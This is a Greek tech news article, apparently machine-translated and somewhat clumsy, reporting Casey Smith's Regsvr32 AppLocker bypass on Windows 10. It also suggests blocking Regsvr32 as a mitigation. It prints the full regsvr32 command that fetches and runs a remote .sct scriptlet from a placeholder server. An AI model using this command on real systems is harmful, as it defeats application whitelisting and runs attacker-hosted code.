Το Regsvr32 μπορεί να χρησιμοποιηθεί για να παρακάμψει το applocker στα παράθυρα 10
Βίντεο: APPLocker in windows 7 2024
Ένας ερευνητής από το Κολοράντο που πήρε το όνομα Casey Smith ανακάλυψε ότι το Regsvr32 μπορεί να χρησιμοποιηθεί για την παράκαμψη του AppLocker στα Windows 10 και αυτό είναι ένα μεγάλο πρόβλημα για τους χρήστες υπολογιστών, ιδιαίτερα εκείνους στο επιχειρηματικό περιβάλλον.
Το AppLocker παρουσιάστηκε για πρώτη φορά στα Windows 7 και στον Windows Server 2008 R2. Έχει σχεδιαστεί ώστε να επιτρέπει στους διαχειριστές να καθορίζουν ποια ομάδα ή χρήστες μπορούν να επωφεληθούν από ορισμένες ή όλες τις εφαρμογές που βασίζονται στη μοναδική ταυτότητα των αρχείων. Εάν είστε άτομο που τείνει να χρησιμοποιεί το AppLocker, τότε θα πρέπει να είναι γνωστό ότι μπορεί να χρησιμοποιηθεί για να δημιουργήσει ορισμένους κανόνες που επιτρέπουν στις εφαρμογές να τρέχουν ή να τις σταματούν στα κομμάτια τους.
Για όσους μπορεί να αγνοούν, το Regvr32 μπορεί να χρησιμοποιηθεί για να εγγραφεί και να καταργήσει την εγγραφή DLLs. Αυτό δεν είναι ένα εργαλείο που κάνει κλικ με ένα κλικ, καθώς είναι ένα βοηθητικό πρόγραμμα γραμμής εντολών, οπότε μόνο οι προηγμένοι χρήστες υπολογιστών θα πρέπει να επιδιώξουν να επωφεληθούν από αυτό που έχει να προσφέρει.
Κατανοούμε ότι με τη χρήση αυτής της τεχνικής, δεν αλλάζει το μητρώο του συστήματος ηλεκτρονικού υπολογιστή, γεγονός που δυσκολεύει τους διαχειριστές να γνωρίζουν αν έχουν πραγματοποιηθεί αλλαγές.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
"Το καταπληκτικό πράγμα εδώ είναι ότι το regsvr32 είναι ήδη ενήμερο για το proxy, χρησιμοποιεί TLS, ακολουθεί ανακατευθύνσεις, κλπ. … Και … Μαντέψατε ένα υπογεγραμμένο, προεπιλεγμένο MS δυαδικό. Έτσι, το μόνο που χρειάζεται να κάνετε είναι να φιλοξενήσετε το αρχείο.sct σε μια θέση που ελέγχετε ", γράφει ο Smith.
Η παραπάνω τεχνική δεν απαιτεί δικαιώματα διαχειριστή και δεν αλλάζει το μητρώο. Επιπλέον, τα σενάρια μπορούν να καλούνται μέσω HTTP ή HTTPS. Προς το παρόν, η Microsoft δεν έχει κυκλοφορήσει μια ενημερωμένη έκδοση κώδικα για αυτό το μικρό πρόβλημα, οπότε η μόνη επιλογή σε αυτό το σημείο είναι να αποκλείσετε το Regsvr32 μέσω του τείχους προστασίας των Windows.
Είναι ενδιαφέρον ότι ο γίγαντας του λογισμικού δεν έχει ακόμη απαντήσει σχετικά με αυτό το ζήτημα ασφαλείας που αντιμετωπίζει το λειτουργικό του σύστημα. Τώρα που βρισκόμαστε στο ύπαιθρο, περιμένουμε να ακούσουμε κάτι από την εταιρεία μαζί με συνομιλίες για μια μελλοντική εμπλοκή.
Επιδιόρθωση: Αυτό το κλειδί προϊόντος δεν μπορεί να χρησιμοποιηθεί για την εγκατάσταση ενός λιανικού αντιγράφου των παραθύρων
Αυτός ο οδηγός αντιμετώπισης προβλημάτων θα σας δείξει πώς μπορείτε να απαλλαγείτε από το μήνυμα σφάλματος "Αυτό το κλειδί προϊόντος δεν μπορεί να χρησιμοποιηθεί για την εγκατάσταση ενός λιανικού αντιγράφου των Windows".
Fix: 'το κλειδί δεν μπορεί να χρησιμοποιηθεί για την ενεργοποίηση αυτής της έκδοσης του σφάλματος των Windows
Εάν είστε ένας από τους χρήστες των Windows 8 που προσπαθούν να εγκαταστήσουν το λειτουργικό σύστημα και λάβετε το μήνυμα "Αυτό το κλειδί δεν μπορεί να χρησιμοποιηθεί για την ενεργοποίηση αυτής της έκδοσης των Windows" τότε αυτό είναι το φροντιστήριο που έγινε ειδικά για εσάς. Για περισσότερες λεπτομέρειες σχετικά με το θέμα καθώς και πώς μπορείτε να διορθώσετε ...
Αυτό το σφάλμα λέξης της Microsoft μπορεί να παρακάμψει την προστασία από αντιμονοτικά αντικείμενα
Υπάρχει ένα κρίσιμο σφάλμα που επηρεάζει το Microsoft Office, το οποίο κυριολεκτικά κάνει κακόβουλους κώδικες μη ανιχνεύσιμοι από λύσεις αντιμονολογικού λογισμικού.
